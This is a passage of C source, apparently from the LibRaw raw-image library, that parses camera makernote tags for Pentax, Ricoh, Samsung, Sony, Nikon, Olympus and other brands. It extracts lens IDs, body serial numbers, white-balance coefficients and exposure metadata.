else if ((!strncmp(make, "PENTAX", 6) || !strncmp(make, "RICOH", 5)) &&
!strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
char buffer[17];
int count=0;
fread(buffer, 16, 1, ifp);
buffer[16] = 0;
for (int i=0; i<16; i++)
{
// sprintf(imgdata.shootinginfo.InternalBodySerial+2*i, "%02x", buffer[i]);
if ((isspace(buffer[i])) ||
(buffer[i] == 0x2D) ||
(isalnum(buffer[i])))
count++;
}
if (count == 16)
{
sprintf (imgdata.shootinginfo.BodySerial, "%8s", buffer+8);
buffer[8] = 0;
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else
{
sprintf (imgdata.shootinginfo.BodySerial, "%02x%02x%02x%02x", buffer[4], buffer[5], buffer[6], buffer[7]);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%02x%02x%02x%02x", buffer[8], buffer[9], buffer[10], buffer[11]);
}
}
else if ((tag == 0x1001) && (type == 3))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
imgdata.lens.makernotes.FocalType = 1;
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
}
else if (!strncmp(make, "RICOH", 5) &&
strncmp(model, "PENTAX", 6))
{
if ((tag == 0x0005) && !strncmp(model, "GXR", 3))
{
char buffer[9];
buffer[8] = 0;
fread(buffer, 8, 1, ifp);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
else if ((tag == 0x2001) && !strncmp(model, "GXR", 3))
{
short ntags, cur_tag;
fseek(ifp, 20, SEEK_CUR);
ntags = get2();
cur_tag = get2();
while (cur_tag != 0x002c)
{
fseek(ifp, 10, SEEK_CUR);
cur_tag = get2();
}
fseek(ifp, 6, SEEK_CUR);
fseek(ifp, get4()+20, SEEK_SET);
stread(imgdata.shootinginfo.BodySerial, 12, ifp);
get2();
imgdata.lens.makernotes.LensID = getc(ifp) - '0';
switch(imgdata.lens.makernotes.LensID) {
case 1:
case 2:
case 3:
case 5:
case 6:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_RicohModule;
break;
case 8:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
break;
default:
imgdata.lens.makernotes.LensID = -1;
}
fseek(ifp, 17, SEEK_CUR);
stread(imgdata.lens.LensSerial, 12, ifp);
}
}
else if ((!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && dng_version)) &&
strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 2, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
unique_id = imgdata.lens.makernotes.CamID = get4();
}
else if (tag == 0xa002)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len)
{
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
break;
default:
// CameraInfo2 & 3
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
free(table_buf);
}
else if ((tag == 0x0020) && // WBInfoA100, needs 0xb028 processing
!strncasecmp(model, "DSLR-A100", 9))
{
fseek(ifp,0x49dc,SEEK_CUR);
stmread(imgdata.shootinginfo.InternalBodySerial, 12, ifp);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 256000) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len <256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
free(table_buf);
}
}
fseek(ifp,_pos,SEEK_SET);
#endif
if (tag == 2 && strstr(make,"NIKON") && !iso_speed)
iso_speed = (get2(),get2());
if (tag == 37 && strstr(make,"NIKON") && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc,1,1,ifp);
iso_speed = int(100.0 * libraw_powf64(2.0f,float(cc)/12.0-5.0));
}
if (tag == 4 && len > 26 && len < 35) {
if ((i=(get4(),get2())) != 0x7fff && (!iso_speed || iso_speed == 65535))
iso_speed = 50 * libraw_powf64(2.0, i/32.0 - 4);
#ifdef LIBRAW_LIBRARY_BUILD
get4();
#else
if ((i=(get2(),get2())) != 0x7fff && !aperture)
aperture = libraw_powf64(2.0, i/64.0);
#endif
if ((i=get2()) != 0xffff && !shutter)
shutter = libraw_powf64(2.0, (short) i/-32.0);
wbi = (get2(),get2());
shot_order = (get2(),get2());
}
if ((tag == 4 || tag == 0x114) && !strncmp(make,"KONICA",6)) {
fseek (ifp, tag == 4 ? 140:160, SEEK_CUR);
switch (get2()) {
case 72: flip = 0; break;
case 76: flip = 6; break;
case 82: flip = 5; break;
}
}
if (tag == 7 && type == 2 && len > 20)
fgets (model2, 64, ifp);
if (tag == 8 && type == 4)
shot_order = get4();
if (tag == 9 && !strncmp(make,"Canon",5))
fread (artist, 64, 1, ifp);
if (tag == 0xc && len == 4)
FORC3 cam_mul[(c << 1 | c >> 1) & 3] = getreal(type);
if (tag == 0xd && type == 7 && get2() == 0xaaaa) {
for (c=i=2; (ushort) c != 0xbbbb && i < len; i++)
c = c << 8 | fgetc(ifp);
while ((i+=4) < len-5)
if (get4() == 257 && (i=len) && (c = (get4(),fgetc(ifp))) < 3)
flip = "065"[c]-'0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x10 && type == 4) unique_id = get4();
#endif
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos2 = ftell(ifp);
if (!strncasecmp(make,"Olympus",7))
{
short nWB, tWB;
if ((tag == 0x20300108) || (tag == 0x20310109))
imgdata.makernotes.olympus.ColorSpace = get2();
if ((tag == 0x20400102) && (len == 2) &&
(!strncasecmp(model, "E-410", 5) || !strncasecmp(model, "E-510", 5)))
{
int i;
for (i=0; i<64; i++)
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] =
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
for (i=64; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
if ((tag >= 0x20400102) && (tag <= 0x2040010d))
{
ushort CT;
nWB = tag-0x20400102;
switch (nWB)
{
case 0 : CT = 3000; tWB = LIBRAW_WBI_Tungsten; break;
case 1 : CT = 3300; tWB = 0x100; break;
case 2 : CT = 3600; tWB = 0x100; break;
case 3 : CT = 3900; tWB = 0x100; break;
case 4 : CT = 4000; tWB = LIBRAW_WBI_FL_W; break;
case 5 : CT = 4300; tWB = 0x100; break;
case 6 : CT = 4500; tWB = LIBRAW_WBI_FL_D; break;
case 7 : CT = 4800; tWB = 0x100; break;
case 8 : CT = 5300; tWB = LIBRAW_WBI_FineWeather; break;
case 9 : CT = 6000; tWB = LIBRAW_WBI_Cloudy; break;
case 10: CT = 6600; tWB = LIBRAW_WBI_FL_N; break;
case 11: CT = 7500; tWB = LIBRAW_WBI_Shade; break;
default: CT = 0; tWB = 0x100;
}
if (CT)
{
imgdata.color.WBCT_Coeffs[nWB][0] = CT;
imgdata.color.WBCT_Coeffs[nWB][1] = get2();
imgdata.color.WBCT_Coeffs[nWB][3] = get2();
if (len == 4)
{
imgdata.color.WBCT_Coeffs[nWB][2] = get2();
imgdata.color.WBCT_Coeffs[nWB][4] = get2();
}
}
if (tWB != 0x100)
FORC4 imgdata.color.WB_Coeffs[tWB][c] = imgdata.color.WBCT_Coeffs[nWB][c+1];
}
if ((tag >= 0x20400113) && (tag <= 0x2040011e))
{
nWB = tag-0x20400113;
imgdata.color.WBCT_Coeffs[nWB][2] = imgdata.color.WBCT_Coeffs[nWB][4] = get2();
switch (nWB)
{
case 0: tWB = LIBRAW_WBI_Tungsten; break;
case 4: tWB = LIBRAW_WBI_FL_W; break;
case 6: tWB = LIBRAW_WBI_FL_D; break;
case 8: tWB = LIBRAW_WBI_FineWeather; break;
case 9: tWB = LIBRAW_WBI_Cloudy; break;
case 10: tWB = LIBRAW_WBI_FL_N; break;
case 11: tWB = LIBRAW_WBI_Shade; break;
default: tWB = 0x100;
}
if (tWB != 0x100)
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] =
imgdata.color.WBCT_Coeffs[nWB][2];
}
if (tag == 0x20400121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
if (len == 4)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
}
if (tag == 0x2040011f)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
if (tag == 0x30000120)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
if (len == 2)
{
for (int i=0; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
}
if (tag == 0x30000121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
}
if (tag == 0x30000122)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = get2();
}
if (tag == 0x30000123)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
}
if (tag == 0x30000124)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][2] = get2();
}
if (tag == 0x30000130)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
}
if (tag == 0x30000131)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
}
if (tag == 0x30000132)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
}
if (tag == 0x30000133)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
}
if((tag == 0x20400805) && (len == 2))
{
imgdata.makernotes.olympus.OlympusSensorCalibration[0]=getreal(type);
imgdata.makernotes.olympus.OlympusSensorCalibration[1]=getreal(type);
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.olympus.OlympusSensorCalibration[0];
}
if (tag == 0x20200401)
{
imgdata.other.FlashEC = getreal(type);
}
}
fseek(ifp,_pos2,SEEK_SET);
#endif
if (tag == 0x11 && is_raw && !strncmp(make,"NIKON",5)) {
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
}
if (tag == 0x14 && type == 7) {
if (len == 2560) {
fseek (ifp, 1248, SEEK_CUR);
goto get2_256;
}
fread (buf, 1, 10, ifp);
if (!strncmp(buf,"NRW ",4)) {
fseek (ifp, strcmp(buf+4,"0100") ? 46:1546, SEEK_CUR);
cam_mul[0] = get4() << 2;
cam_mul[1] = get4() + get4();
cam_mul[2] = get4() << 2;
}
}
if (tag == 0x15 && type == 2 && is_raw)
fread (model, 64, 1, ifp);
if (strstr(make,"PENTAX")) {
if (tag == 0x1b) tag = 0x1018;
if (tag == 0x1c) tag = 0x1017;
}
if (tag == 0x1d) {
while ((c = fgetc(ifp)) && c != EOF)
#ifdef LIBRAW_LIBRARY_BUILD
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
#endif
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
#ifdef LIBRAW_LIBRARY_BUILD
}
if (!imgdata.shootinginfo.BodySerial[0])
sprintf(imgdata.shootinginfo.BodySerial, "%d", serial);
#endif
}
if (tag == 0x29 && type == 1) { // Canon PowerShot G9
c = wbi < 18 ? "012347800000005896"[wbi]-'0' : 0;
fseek (ifp, 8 + c*32, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get4();
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x3d && type == 3 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2() >> (14-tiff_bps);
#endif
if (tag == 0x81 && type == 4) {
data_offset = get4();
fseek (ifp, data_offset + 41, SEEK_SET);
raw_height = get2() * 2;
raw_width = get2();
filters = 0x61616161;
}
if ((tag == 0x81 && type == 7) ||
(tag == 0x100 && type == 7) ||
(tag == 0x280 && type == 1)) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (tag == 0x88 && type == 4 && (thumb_offset = get4()))
thumb_offset += base;
if (tag == 0x89 && type == 4)
thumb_length = get4();
if (tag == 0x8c || tag == 0x96)
meta_offset = ftell(ifp);
if (tag == 0x97) {
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
switch (ver97) {
case 100:
fseek (ifp, 68, SEEK_CUR);
FORC4 cam_mul[(c >> 1) | ((c & 1) << 1)] = get2();
break;
case 102:
fseek (ifp, 6, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
break;
case 103:
fseek (ifp, 16, SEEK_CUR);
FORC4 cam_mul[c] = get2();
}
if (ver97 >= 200) {
if (ver97 != 205) fseek (ifp, 280, SEEK_CUR);
fread (buf97, 324, 1, ifp);
}
}
if (tag == 0xa1 && type == 7) {
order = 0x4949;
fseek (ifp, 140, SEEK_CUR);
FORC3 cam_mul[c] = get4();
}
if (tag == 0xa4 && type == 3) {
fseek (ifp, wbi*48, SEEK_CUR);
FORC3 cam_mul[c] = get2();
}
if (tag == 0xa7) { // shutter count
NikonKey = fgetc(ifp)^fgetc(ifp)^fgetc(ifp)^fgetc(ifp);
if ( (unsigned) (ver97-200) < 17) {
ci = xlat[0][serial & 0xff];
cj = xlat[1][NikonKey];
ck = 0x60;
for (i=0; i < 324; i++)
buf97[i] ^= (cj += ci * ck++);
i = "66666>666;6A;:;55"[ver97-200] - '0';
FORC4 cam_mul[c ^ (c >> 1) ^ (i & 1)] =
sget2 (buf97 + (i & -2) + c*2);
}
#ifdef LIBRAW_LIBRARY_BUILD
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
#endif
}
if(tag == 0xb001 && type == 3) // Sony ModelID
{
unique_id = get2();
}
if (tag == 0x200 && len == 3)
shot_order = (get4(),get4());
if (tag == 0x200 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x201 && len == 4)
FORC4 cam_mul[c ^ (c >> 1)] = get2();
if (tag == 0x220 && type == 7)
meta_offset = ftell(ifp);
if (tag == 0x401 && type == 4 && len == 4)
FORC4 cblack[c ^ c >> 1] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
// not corrected for file bitcount, to be patched in open_datastream
if (tag == 0x03d && strstr(make,"NIKON") && len == 4)
{
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black += i;
}
#endif
if (tag == 0xe01) { /* Nikon Capture Note */
#ifdef LIBRAW_LIBRARY_BUILD
int loopc = 0;
#endif
order = 0x4949;
fseek (ifp, 22, SEEK_CUR);
for (offset=22; offset+22 < len; offset += 22+i) {
#ifdef LIBRAW_LIBRARY_BUILD
if(loopc++>1024)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
tag = get4();
fseek (ifp, 14, SEEK_CUR);
i = get4()-4;
if (tag == 0x76a43207) flip = get2();
else fseek (ifp, i, SEEK_CUR);
}
}
if (tag == 0xe80 && len == 256 && type == 7) {
fseek (ifp, 48, SEEK_CUR);
cam_mul[0] = get2() * 508 * 1.078 / 0x10000;
cam_mul[2] = get2() * 382 * 1.173 / 0x10000;
}
if (tag == 0xf00 && type == 7) {
if (len == 614)
fseek (ifp, 176, SEEK_CUR);
else if (len == 734 || len == 1502)
fseek (ifp, 148, SEEK_CUR);
else goto next;
goto get2_256;
}
if ((tag == 0x1011 && len == 9) || tag == 0x20400200)
for (i=0; i < 3; i++)
{
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.makernotes.olympus.ColorSpace)
{
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
}
else
{
FORC3 imgdata.color.ccm[i][c] = ((short) get2()) / 256.0;
}
#else
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
#endif
}
if ((tag == 0x1012 || tag == 0x20400600) && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
